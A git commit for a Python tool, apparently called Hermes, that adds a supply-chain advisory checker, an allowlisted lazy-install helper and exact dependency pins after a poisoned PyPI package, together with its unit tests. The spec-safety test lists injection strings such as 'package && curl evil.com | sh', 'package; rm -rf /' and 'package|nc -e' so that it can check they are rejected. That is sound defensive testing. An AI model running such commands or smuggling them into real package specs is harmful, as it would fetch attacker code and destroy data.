feat(security): supply-chain advisory checker + lazy-install framework + tiered install fallback (#24220)

* feat(security): supply-chain advisory checker + lazy-install framework + tiered install fallback Three coordinated mitigations for the Mini Shai-Hulud worm hitting mistralai 2.4.6 on PyPI (2026-05-12) and for the next single-package compromise that follows. # What this PR makes true 1. Users with the poisoned mistralai 2.4.6 in their venv get a loud detection banner with copy-pasteable remediation steps the moment they run hermes (and on every gateway startup). 2. One quarantined / yanked PyPI package can no longer silently demote a fresh install to 'core only' — the installer keeps every other extra and tells the user which tier landed. 3. Future opt-in backends (Mistral, ElevenLabs, Honcho, etc.) can lazy-install on first use under a strict allowlist, instead of eagerly pulling everything at install time. # Detection: hermes_cli/security_advisories.py - ADVISORIES catalog (one entry currently: shai-hulud-2026-05 for mistralai==2.4.6). Adding the next one is a single dataclass. - detect_compromised() uses importlib.metadata.version() — no pip dependency, works in uv venvs that lack pip. - Banner cache (~/.hermes/cache/advisory_banner_seen) rate-limits the startup banner to once per 24h per advisory. - Acks persisted to security.acked_advisories in config.yaml; never re-banner after ack. - Wired into: * hermes doctor — runs first, prints full remediation block * hermes doctor --ack <id> — dismisses an advisory * cli.py interactive run() and single-query branches — short stderr banner pointing at hermes doctor * gateway/run.py startup — operator-visible warning in gateway.log # Lazy-install framework: tools/lazy_deps.py - LAZY_DEPS allowlist maps namespaced feature keys (tts.elevenlabs, memory.honcho, provider.bedrock, etc.) to pip specs. - ensure(feature) installs missing deps in the active venv via the uv → pip → ensurepip ladder (matches tools_config._pip_install). - Strict spec safety regex rejects URLs, file paths, shell metas, pip flag injection, control chars — only PyPI-by-name accepted. - Gated on security.allow_lazy_installs (default true) plus the HERMES_DISABLE_LAZY_INSTALLS env var for restricted/audited envs. - Migrated three backends as proof of pattern: * tools/tts_tool.py — _import_elevenlabs() calls ensure first * plugins/memory/honcho/client.py — get_honcho_client lazy-installs * tts.mistral / stt.mistral entries pre-registered for when PyPI restores mistralai # Installer fallback tiers scripts/install.sh, scripts/install.ps1, setup-hermes.sh: - Centralised _BROKEN_EXTRAS list (currently: mistral). Edit one array when a transitive breaks; users keep every other extra. - New 'all minus known-broken' tier between [all] and the existing PyPI-only-extras tier. Only kicks in when [all] fails resolve. - All three tiers explicit: every fallback announces which tier landed and prints a re-run hint when not on Tier 1. - install.ps1 and install.sh both regenerate their tier specs from the same _BROKEN_EXTRAS array so updates stay in sync. Side effect: install.ps1 Tier 2 spec previously hardcoded 'mistral' in its extra list — bug fixed by the refactor (mistral is filtered out). # Config hermes_cli/config.py — DEFAULT_CONFIG.security gains: - acked_advisories: [] (advisory IDs the user has dismissed) - allow_lazy_installs: True (security gate for ensure()) No config version bump needed — both keys nest under existing security: block, and load_config's deep-merge picks up DEFAULT_CONFIG defaults for users with older configs. # Tests tests/hermes_cli/test_security_advisories.py — 23 tests covering: - detect_compromised matches/non-matches, wildcard frozenset - ack persistence, idempotence, blank rejection, config-failure path - banner cache rate limiting + 24h re-banner + ack-stops-banner - short_banner_lines / full_remediation_text / render_doctor_section / gateway_log_message - shipped catalog well-formedness invariant tests/tools/test_lazy_deps.py — 40 tests covering: - spec safety: 11 safe parametrized + 18 unsafe parametrized - allowlist: unknown-feature rejection, namespace.name shape, every shipped spec passes the safety regex - security gating: config flag, env var, default, fail-open - ensure() happy/sad paths: already-satisfied, install success, pip stderr surfaced on failure, install-succeeds-but-still-missing - is_available, feature_install_command Combined: 63 new tests, all passing under scripts/run_tests.sh. # Validation - scripts/run_tests.sh tests/hermes_cli/test_security_advisories.py tests/tools/test_lazy_deps.py → 63/63 passing - scripts/run_tests.sh tests/hermes_cli/test_doctor.py tests/hermes_cli/test_doctor_command_install.py tests/tools/test_tts_mistral.py tests/tools/test_transcription_tools.py tests/tools/test_transcription_dotenv_fallback.py → 165/165 passing - scripts/run_tests.sh tests/hermes_cli/ tests/tools/ → 9191 passed, 8 pre-existing failures (verified on origin/main before this change) - bash -n on install.sh and setup-hermes.sh → OK - py_compile on all modified .py files → OK - End-to-end smoke test of detect_compromised + render_doctor_section + gateway_log_message with mocked installed version → produces copy-pasteable remediation output # Community Full advisory + remediation steps: website/docs/community/security-advisories/shai-hulud-mistralai-2026-05.md Short-form post drafts (Discord, GitHub pinned issue, README banner): scripts/community-announcement-shai-hulud.md Refs: PR #24205 (mistral disabled), Socket Security advisory <https://socket.dev/blog/mini-shai-hulud-worm-pypi> * build(deps): pin every direct dep to ==X.Y.Z (no ranges) Companion to the supply-chain advisory work: replace every >=/</~= range in pyproject.toml's [project.dependencies] and [project.optional-dependencies] with an exact ==X.Y.Z pin sourced from uv.lock. Why: ranges allow PyPI to ship a fresh version of any direct dep at any time without a code review on our side. With ranges, the malicious mistralai 2.4.6 release would have been pulled by every fresh 'pip install -e .[all]' for the hours between upload and PyPI's quarantine — exactly the install window we got hit on. Exact pins close that window: the only way a new package version reaches a user is via an intentional update on our end. What the user-facing change is: nothing, behavior-wise. Every package resolves to the same version it was already resolving to via uv.lock — the pins just remove the resolver's freedom to pick a different one. Cost: any user installing Hermes alongside another package that requires a newer pin gets a resolver conflict. Acceptable for our isolated-venv install path; documented in the new comment block. Build-system requires line (setuptools>=61.0) is intentionally left as a range — pinning the build backend would block fresh pip from bootstrapping the build on architectures where that exact wheel isn't available. mistral extra (mistralai==2.3.0) is pinned but stays out of [all] (per PR #24205). 'uv lock' regeneration will fail until PyPI restores mistralai; lockfile regeneration is gated behind that, NOT on every PR. LAZY_DEPS in tools/lazy_deps.py also moved to exact pins so the lazy- install pathway can never resolve a different version than the one declared in pyproject.toml. Validation: - Cross-checked all 77 pinned direct deps in pyproject.toml against uv.lock — every pin matches the resolved version exactly. - Cross-checked all LAZY_DEPS specs against uv.lock — same. - 'uv pip install -e .[all] --dry-run' resolves 205 packages cleanly. - tests/tools/test_lazy_deps.py + tests/hermes_cli/test_security_advisories.py → 63/63 passing (every shipped spec passes the safety regex). - Doctor + TTS + transcription targeted suite → 146/146 passing. * build(deps): hash-verify transitives via uv.lock; remove unresolvable [mistral] extra You asked: 'what about the dependencies the dependencies rely on?' — correctly noting that exact-pinning direct deps in pyproject.toml does NOT cover the transitive graph. `pip install` and `uv pip install` both re-resolve transitives fresh from PyPI at install time, so a compromised transitive (e.g. `httpcore` if it got worm-poisoned tomorrow) would still hit our users even with every direct dep exact-pinned. # What this commit fixes 1. **Both real installer scripts now prefer `uv sync --locked` as Tier 0.** uv.lock records SHA256 hashes for every transitive — a compromised package with a different hash gets REJECTED. Falls through to the existing `uv pip install` cascade if the lockfile is missing or stale, with a loud warning that the fallback path does NOT hash-verify transitives. Previously only `setup-hermes.sh` (the dev path) used the lockfile; `scripts/install.sh` and `scripts/install.ps1` (the paths fresh users actually run) skipped it. 2. **Removed the `[mistral]` extra entirely.** The `mistralai` PyPI project is fully quarantined right now — every version returns 404, so any pin we wrote was unresolvable, which broke `uv lock --check` in CI. Restoration is documented in pyproject.toml as a 5-step checklist (verify, re-add extra, re-enable in 4 modules, regenerate lock, optionally re-add to [all]). 3. **Regenerated uv.lock.** 262 packages, mistralai/eval-type-backport/ jsonpath-python pruned. `uv lock --check` now passes. # Defense-in-depth view | Layer | Where | Protects against | |----------------------------|-------------------|-------------------------------------------| | Exact pins in pyproject | direct deps | new mistralai 2.4.6-style direct compromise | | uv.lock + `--locked` install | transitive graph | transitive worm injection | | Tier-0 hash-verified path | install.sh / .ps1 | actually USE the lockfile in fresh installs | | `uv lock --check` CI gate | every PR | drift between pyproject and lockfile | | `hermes_cli/security_advisories.py` | runtime | cleanup for users who already got hit | The exact pinning + hash verification together close the supply-chain gap. Without the lockfile path, exact pins alone are theater. # Validation - `uv lock --check` → passes (262 packages resolved, no drift). - `bash -n` on install.sh + setup-hermes.sh → OK. - 209/209 tests passing across new + adjacent test files (test_lazy_deps.py, test_security_advisories.py, test_doctor.py, test_tts_mistral.py, test_transcription_tools.py). - TOML parse OK. * chore: remove community announcement drafts (PR body covers it) * build(deps): lazy-install every opt-in backend (anthropic, search, terminal, platforms, dashboard) Extends the lazy-install framework to cover everything that's not used by every hermes session. Base install drops from ~60 packages to 45. Moved out of core dependencies = []: - anthropic (only when provider=anthropic native, not via aggregators) - exa-py, firecrawl-py, parallel-web (search backends; only when picked) - fal-client (image gen; only when picked) - edge-tts (default TTS but still optional) New extras in pyproject.toml: [anthropic] [exa] [firecrawl] [parallel-web] [fal] [edge-tts]. All added to [all]. New LAZY_DEPS entries: provider.anthropic, search.{exa,firecrawl,parallel}, tts.edge, image.fal, memory.hindsight, platform.{telegram,discord,matrix}, terminal.{modal,daytona,vercel}, tool.dashboard. Each import site now calls ensure() before importing the SDK. Where the module had a top-level try/except (telegram, discord, fastapi), the graceful-fallback pattern was extended to lazy-install on first check_*_requirements() call and re-bind module globals. Updated test_windows_native_support.py tzdata check from snapshot (>=2023.3 literal) to invariant (any version + win32 marker). Validation: - Base install: 45 packages (was ~60); 6 newly-extracted packages absent - uv lock --check: passes (262 packages, no drift) - 209/209 lazy_deps + advisory + doctor + tts/transcription tests passing - py_compile clean on all 12 modified modules
2026-05-12 01:02:25 -07:00
parent 99ad2d1372
commit c1eb2dcda7
28 changed files with 2433 additions and 243 deletions
--- a/tests/hermes_cli/test_security_advisories.py
+++ b/tests/hermes_cli/test_security_advisories.py
@@ -0,0 +1,330 @@
+"""Tests for hermes_cli.security_advisories.
+
+The advisory module is the user-facing detection / remediation surface
+for supply-chain attacks (e.g. the Mini Shai-Hulud worm of May 2026 that
+poisoned mistralai 2.4.6 on PyPI). These tests exercise the public API in
+isolation — no real package metadata, no real config, no real cache.
+"""
+
+from __future__ import annotations
+
+import time
+from pathlib import Path
+from typing import Iterator
+
+import pytest
+
+import hermes_cli.security_advisories as adv
+
+
+# ---------------------------------------------------------------------------
+# Fixtures
+# ---------------------------------------------------------------------------
+
+
+@pytest.fixture
+def fake_advisory() -> adv.Advisory:
+    """A self-contained Advisory used across tests."""
+    return adv.Advisory(
+        id="test-advisory-2026-99",
+        title="Test advisory",
+        summary="Pretend this package has been compromised.",
+        url="https://example.com/advisory",
+        compromised=(
+            ("fake-malicious-pkg", frozenset({"6.6.6"})),
+        ),
+        remediation=(
+            "pip uninstall -y fake-malicious-pkg",
+            "Rotate any credentials that may have been exposed.",
+        ),
+        published="2026-01-01",
+        severity="critical",
+    )
+
+
+@pytest.fixture
+def isolated_home(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> Path:
+    """Redirect HERMES_HOME so banner cache and config writes are sandboxed."""
+    home = tmp_path / ".hermes"
+    home.mkdir()
+    (home / "cache").mkdir()
+    monkeypatch.setattr(Path, "home", lambda: tmp_path)
+    monkeypatch.setenv("HERMES_HOME", str(home))
+    return home
+
+
+@pytest.fixture
+def patched_version(monkeypatch: pytest.MonkeyPatch) -> Iterator[dict[str, str]]:
+    """Override _installed_version with a controllable lookup table."""
+    table: dict[str, str] = {}
+    monkeypatch.setattr(adv, "_installed_version", lambda pkg: table.get(pkg))
+    yield table
+
+
+# ---------------------------------------------------------------------------
+# detect_compromised
+# ---------------------------------------------------------------------------
+
+
+class TestDetectCompromised:
+    def test_no_match_returns_empty_list(self, fake_advisory, patched_version):
+        # No matching package installed.
+        hits = adv.detect_compromised(advisories=[fake_advisory])
+        assert hits == []
+
+    def test_exact_version_match(self, fake_advisory, patched_version):
+        patched_version["fake-malicious-pkg"] = "6.6.6"
+        hits = adv.detect_compromised(advisories=[fake_advisory])
+        assert len(hits) == 1
+        assert hits[0].advisory.id == fake_advisory.id
+        assert hits[0].package == "fake-malicious-pkg"
+        assert hits[0].installed_version == "6.6.6"
+
+    def test_safe_version_does_not_match(self, fake_advisory, patched_version):
+        # Package is installed but the version is not in the compromised set.
+        patched_version["fake-malicious-pkg"] = "6.6.5"
+        hits = adv.detect_compromised(advisories=[fake_advisory])
+        assert hits == []
+
+    def test_empty_compromised_set_matches_any_version(
+        self, patched_version
+    ):
+        # An advisory with an empty version set is a "any version is suspect"
+        # wildcard — used when an entire maintainer namespace is owned.
+        wildcard = adv.Advisory(
+            id="wildcard",
+            title="Whole namespace owned",
+            summary="x",
+            url="x",
+            compromised=(("evil-namespace", frozenset()),),
+            remediation=("uninstall it",),
+        )
+        patched_version["evil-namespace"] = "0.0.1"
+        hits = adv.detect_compromised(advisories=[wildcard])
+        assert len(hits) == 1
+        assert hits[0].installed_version == "0.0.1"
+
+
+# ---------------------------------------------------------------------------
+# Acknowledgement persistence
+# ---------------------------------------------------------------------------
+
+
+class TestAck:
+    def test_get_acked_ids_empty_when_no_config(self, monkeypatch):
+        # load_config raises → returns empty set, doesn't crash.
+        monkeypatch.setattr(
+            "hermes_cli.config.load_config",
+            lambda: (_ for _ in ()).throw(RuntimeError("boom")),
+        )
+        assert adv.get_acked_ids() == set()
+
+    def test_filter_unacked_strips_dismissed(self, fake_advisory, monkeypatch):
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: {fake_advisory.id})
+        assert adv.filter_unacked([hit]) == []
+
+    def test_filter_unacked_passes_through_unknown(
+        self, fake_advisory, monkeypatch
+    ):
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        assert adv.filter_unacked([hit]) == [hit]
+
+    def test_ack_advisory_persists_id(self, isolated_home, monkeypatch):
+        # Stub the config layer end-to-end with a tiny in-memory store so we
+        # don't depend on the full hermes_cli.config bootstrap.
+        store: dict = {"security": {}}
+        monkeypatch.setattr(
+            "hermes_cli.config.load_config", lambda: store
+        )
+        monkeypatch.setattr(
+            "hermes_cli.config.save_config",
+            lambda cfg: store.update(cfg) or None,
+        )
+        assert adv.ack_advisory("test-advisory-2026-99") is True
+        assert "test-advisory-2026-99" in store["security"]["acked_advisories"]
+        # Idempotent.
+        adv.ack_advisory("test-advisory-2026-99")
+        assert (
+            store["security"]["acked_advisories"].count("test-advisory-2026-99")
+            == 1
+        )
+
+    def test_ack_advisory_rejects_blank(self, isolated_home):
+        assert adv.ack_advisory("") is False
+        assert adv.ack_advisory("   ") is False
+
+
+# ---------------------------------------------------------------------------
+# Banner cache rate limiting
+# ---------------------------------------------------------------------------
+
+
+class TestBannerCache:
+    def test_first_call_returns_due_hits(
+        self, fake_advisory, isolated_home, monkeypatch
+    ):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        due = adv.hits_due_for_banner([hit])
+        assert due == [hit]
+
+    def test_second_call_within_window_suppresses(
+        self, fake_advisory, isolated_home, monkeypatch
+    ):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        adv.hits_due_for_banner([hit])
+        # Same banner inside repeat window → suppressed.
+        again = adv.hits_due_for_banner([hit])
+        assert again == []
+
+    def test_call_after_window_re_banners(
+        self, fake_advisory, isolated_home, monkeypatch
+    ):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        adv.hits_due_for_banner([hit])
+        # Backdate the cache so it looks like the banner was shown more
+        # than 24h ago — should re-banner.
+        cache_path = adv._banner_cache_path()
+        assert cache_path is not None
+        old_lines = cache_path.read_text(encoding="utf-8").splitlines()
+        backdated = []
+        for line in old_lines:
+            parts = line.split(None, 1)
+            if len(parts) == 2:
+                backdated.append(f"{parts[0]} {time.time() - 48 * 3600}")
+        cache_path.write_text("\n".join(backdated) + "\n", encoding="utf-8")
+        again = adv.hits_due_for_banner([hit])
+        assert again == [hit]
+
+    def test_acked_hits_never_banner(
+        self, fake_advisory, isolated_home, monkeypatch
+    ):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: {fake_advisory.id})
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        assert adv.hits_due_for_banner([hit]) == []
+
+
+# ---------------------------------------------------------------------------
+# Rendering
+# ---------------------------------------------------------------------------
+
+
+class TestRendering:
+    def test_short_banner_lines_includes_id_and_version(self, fake_advisory):
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        lines = adv.short_banner_lines([hit])
+        joined = "\n".join(lines)
+        assert fake_advisory.id in joined
+        assert fake_advisory.title in joined
+        assert "fake-malicious-pkg==6.6.6" in joined
+        assert "hermes doctor" in joined
+
+    def test_full_remediation_text_contains_all_steps(self, fake_advisory):
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        body = "\n".join(adv.full_remediation_text(hit))
+        # All remediation steps must be present.
+        for step in fake_advisory.remediation:
+            assert step in body
+        assert fake_advisory.url in body
+        assert fake_advisory.summary in body
+
+    def test_render_doctor_section_clean_state(self):
+        # No hits → success message, has_problems=False.
+        has_problems, lines = adv.render_doctor_section([])
+        assert has_problems is False
+        assert any("No active security advisories" in line for line in lines)
+
+    def test_render_doctor_section_with_unacked_hit(
+        self, fake_advisory, monkeypatch
+    ):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        has_problems, lines = adv.render_doctor_section([hit])
+        assert has_problems is True
+        body = "\n".join(lines)
+        assert fake_advisory.title in body
+
+    def test_gateway_log_message_singular(self, fake_advisory, monkeypatch):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        msg = adv.gateway_log_message([hit])
+        assert msg is not None
+        assert fake_advisory.id in msg
+        assert "fake-malicious-pkg==6.6.6" in msg
+
+    def test_gateway_log_message_returns_none_for_no_hits(self):
+        assert adv.gateway_log_message([]) is None
+
+
+# ---------------------------------------------------------------------------
+# Real catalog smoke test
+# ---------------------------------------------------------------------------
+
+
+class TestRealCatalog:
+    def test_advisories_well_formed(self):
+        """Every shipped advisory must be self-consistent.
+
+        Catches data-entry mistakes (empty IDs, missing remediation, bad
+        compromised tuples) before they ship.
+        """
+        seen_ids: set[str] = set()
+        for advisory in adv.ADVISORIES:
+            assert advisory.id, "advisory has empty id"
+            assert advisory.id not in seen_ids, f"duplicate id {advisory.id}"
+            seen_ids.add(advisory.id)
+            assert advisory.title, f"{advisory.id}: empty title"
+            assert advisory.summary, f"{advisory.id}: empty summary"
+            assert advisory.remediation, f"{advisory.id}: empty remediation"
+            assert advisory.url.startswith("http"), \
+                f"{advisory.id}: bad url {advisory.url!r}"
+            assert advisory.compromised, \
+                f"{advisory.id}: empty compromised tuple"
+            for pkg, versions in advisory.compromised:
+                assert pkg, f"{advisory.id}: empty package name"
+                assert isinstance(versions, frozenset), \
+                    f"{advisory.id}: versions must be frozenset"
--- a/tests/tools/test_lazy_deps.py
+++ b/tests/tools/test_lazy_deps.py
@@ -0,0 +1,228 @@
+"""Tests for tools.lazy_deps — the supply-chain-resilient on-demand installer.
+
+The lazy_deps module is the architectural fix for the "one quarantined
+package nukes 10 unrelated extras" problem. It exposes ``ensure(feature)``
+which only installs from a strict allowlist, refuses anything that looks
+like a URL / file path, runs venv-scoped, and respects the
+``security.allow_lazy_installs`` config flag.
+
+These tests cover the security boundary and the public API. The real pip
+call is mocked — we never actually shell out during unit tests.
+"""
+
+from __future__ import annotations
+
+from typing import Iterator
+
+import pytest
+
+import tools.lazy_deps as ld
+
+
+# ---------------------------------------------------------------------------
+# Spec safety
+# ---------------------------------------------------------------------------
+
+
+class TestSpecSafety:
+    @pytest.mark.parametrize("spec", [
+        "mistralai>=2.3.0,<3",
+        "elevenlabs>=1.0,<2",
+        "honcho-ai>=2.0.1,<3",
+        "boto3>=1.35.0,<2",
+        "mautrix[encryption]>=0.20,<1",
+        "google-api-python-client>=2.100,<3",
+        "youtube-transcript-api>=1.2.0",
+        "qrcode>=7.0,<8",
+        "package",  # bare name, no version
+        "package==1.0.0",
+        "package~=1.0",
+    ])
+    def test_safe_specs_pass(self, spec):
+        assert ld._spec_is_safe(spec), f"expected {spec!r} to be safe"
+
+    @pytest.mark.parametrize("spec", [
+        # URL-shaped → rejected (no remote origin override allowed)
+        "git+https://github.com/foo/bar.git",
+        "https://example.com/foo.tar.gz",
+        # File path → rejected
+        "/etc/passwd",
+        "./local-malware",
+        "../escape",
+        # Shell metacharacters → rejected
+        "package; rm -rf /",
+        "package && curl evil.com | sh",
+        "package`whoami`",
+        "package$(whoami)",
+        "package|nc -e",
+        # Pip flag injection → rejected
+        "--index-url=http://evil/",
+        "-r requirements.txt",
+        # Whitespace control chars → rejected
+        "package\nshell-injection",
+        "package\rmore",
+        # Empty / overly long → rejected
+        "",
+        "x" * 500,
+    ])
+    def test_unsafe_specs_rejected(self, spec):
+        assert not ld._spec_is_safe(spec), \
+            f"expected {spec!r} to be rejected"
+
+
+# ---------------------------------------------------------------------------
+# Allowlist enforcement
+# ---------------------------------------------------------------------------
+
+
+class TestAllowlist:
+    def test_unknown_feature_raises(self, monkeypatch):
+        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
+        with pytest.raises(ld.FeatureUnavailable, match="not in LAZY_DEPS"):
+            ld.ensure("not.a.real.feature")
+
+    def test_lazy_deps_keys_use_namespace_dot_name(self):
+        # Sanity check on the data shape — every key should be at least
+        # one dot-separated namespace.
+        for key in ld.LAZY_DEPS:
+            assert "." in key, f"feature {key!r} should be namespace.name"
+
+    def test_every_lazy_dep_spec_passes_safety(self):
+        # Defence in depth — even though specs are author-controlled,
+        # the safety regex must accept everything we ship.
+        for feature, specs in ld.LAZY_DEPS.items():
+            for spec in specs:
+                assert ld._spec_is_safe(spec), \
+                    f"{feature}: spec {spec!r} fails safety check"
+
+    def test_feature_install_command_returns_pip_invocation(self):
+        cmd = ld.feature_install_command("memory.honcho")
+        assert cmd is not None
+        assert cmd.startswith("uv pip install")
+        assert "honcho-ai" in cmd
+
+    def test_feature_install_command_unknown(self):
+        assert ld.feature_install_command("not.real") is None
+
+
+# ---------------------------------------------------------------------------
+# allow_lazy_installs gating
+# ---------------------------------------------------------------------------
+
+
+class TestSecurityGating:
+    def test_disabled_via_config_raises(self, monkeypatch):
+        # Pretend honcho is missing AND lazy installs are disabled.
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.feat", ("packageX>=1.0,<2",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
+        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: False)
+        with pytest.raises(ld.FeatureUnavailable, match="lazy installs disabled"):
+            ld.ensure("test.feat", prompt=False)
+
+    def test_disabled_via_env_var(self, monkeypatch):
+        monkeypatch.setenv("HERMES_DISABLE_LAZY_INSTALLS", "1")
+        # Bypass config layer; the env var alone must disable.
+        monkeypatch.setattr(
+            "hermes_cli.config.load_config",
+            lambda: {"security": {"allow_lazy_installs": True}},
+        )
+        assert ld._allow_lazy_installs() is False
+
+    def test_default_allows(self, monkeypatch):
+        monkeypatch.delenv("HERMES_DISABLE_LAZY_INSTALLS", raising=False)
+        monkeypatch.setattr(
+            "hermes_cli.config.load_config",
+            lambda: {"security": {}},
+        )
+        assert ld._allow_lazy_installs() is True
+
+    def test_config_failure_fails_open(self, monkeypatch):
+        # If config can't be read at all, we ALLOW installs rather than
+        # blocking the user out of their own backends.
+        monkeypatch.delenv("HERMES_DISABLE_LAZY_INSTALLS", raising=False)
+        monkeypatch.setattr(
+            "hermes_cli.config.load_config",
+            lambda: (_ for _ in ()).throw(RuntimeError("config broken")),
+        )
+        assert ld._allow_lazy_installs() is True
+
+
+# ---------------------------------------------------------------------------
+# ensure() happy/sad paths
+# ---------------------------------------------------------------------------
+
+
+class TestEnsure:
+    def test_already_satisfied_is_noop(self, monkeypatch):
+        # If the package is importable, ensure() returns without calling pip.
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.satisfied", ("zzzfake>=1",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: True)
+        # If pip were called, this would fail loudly.
+        monkeypatch.setattr(
+            ld, "_venv_pip_install",
+            lambda *a, **kw: pytest.fail("pip should not be called"),
+        )
+        ld.ensure("test.satisfied", prompt=False)  # no exception
+
+    def test_install_success_path(self, monkeypatch):
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.install", ("zzzfake>=1",))
+        # First check sees missing, post-install check sees installed.
+        call_count = {"n": 0}
+
+        def fake_satisfied(spec):
+            call_count["n"] += 1
+            return call_count["n"] > 1  # missing first, installed after
+
+        monkeypatch.setattr(ld, "_is_satisfied", fake_satisfied)
+        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
+        monkeypatch.setattr(
+            ld, "_venv_pip_install",
+            lambda specs, **kw: ld._InstallResult(True, "ok", ""),
+        )
+        ld.ensure("test.install", prompt=False)
+
+    def test_install_failure_surfaces_pip_stderr(self, monkeypatch):
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.fail", ("zzzfake>=1",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
+        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
+        monkeypatch.setattr(
+            ld, "_venv_pip_install",
+            lambda specs, **kw: ld._InstallResult(
+                False, "", "ERROR: package not found on PyPI"
+            ),
+        )
+        with pytest.raises(ld.FeatureUnavailable, match="pip install failed"):
+            ld.ensure("test.fail", prompt=False)
+
+    def test_install_succeeds_but_still_missing_raises(self, monkeypatch):
+        # Pip says success but the package still isn't importable
+        # (e.g. site-packages caching, wrong python). Surface this.
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.cache", ("zzzfake>=1",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
+        monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
+        monkeypatch.setattr(
+            ld, "_venv_pip_install",
+            lambda specs, **kw: ld._InstallResult(True, "ok", ""),
+        )
+        with pytest.raises(ld.FeatureUnavailable, match="still not importable"):
+            ld.ensure("test.cache", prompt=False)
+
+
+# ---------------------------------------------------------------------------
+# is_available
+# ---------------------------------------------------------------------------
+
+
+class TestIsAvailable:
+    def test_unknown_feature_returns_false(self):
+        assert ld.is_available("not.a.thing") is False
+
+    def test_satisfied_returns_true(self, monkeypatch):
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.avail", ("zzzfake>=1",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: True)
+        assert ld.is_available("test.avail") is True
+
+    def test_missing_returns_false(self, monkeypatch):
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.miss", ("zzzfake>=1",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
+        assert ld.is_available("test.miss") is False
--- a/tests/tools/test_windows_native_support.py
+++ b/tests/tools/test_windows_native_support.py
@@ -420,12 +420,21 @@ class TestTzdataDependencyDeclared:
        root = Path(__file__).resolve().parents[2]
        source = (root / "pyproject.toml").read_text(encoding="utf-8")
        # The dependency line should be conditional on sys_platform == 'win32'
-        # and should NOT be in the core dependencies for Linux/macOS.
-        assert (
-            'tzdata>=2023.3; sys_platform == \'win32\'' in source
-            or "tzdata>=2023.3; sys_platform == 'win32'" in source
-            or 'tzdata>=2023.3; sys_platform == "win32"' in source
-        ), "tzdata must be a Windows-only dep in pyproject.toml dependencies"
+        # and should NOT be in the core dependencies for Linux/macOS. We do
+        # not care about the exact pinned version (which is bumped over time)
+        # — only that tzdata is declared with a win32 marker. This is an
+        # invariant check, not a snapshot test.
+        import re
+        # Match `"tzdata` … `; sys_platform == 'win32'"` allowing any version
+        # specifier in between (==X.Y.Z, >=X.Y.Z,<W, etc.) and either quote
+        # style on the marker.
+        pattern = re.compile(
+            r'"tzdata[^"]*;\s*sys_platform\s*==\s*[\'"]win32[\'"]\s*"'
+        )
+        assert pattern.search(source), (
+            "tzdata must be a Windows-only dep in pyproject.toml dependencies "
+            "(declared with a `; sys_platform == 'win32'` marker)"
+        )


 # ---------------------------------------------------------------------------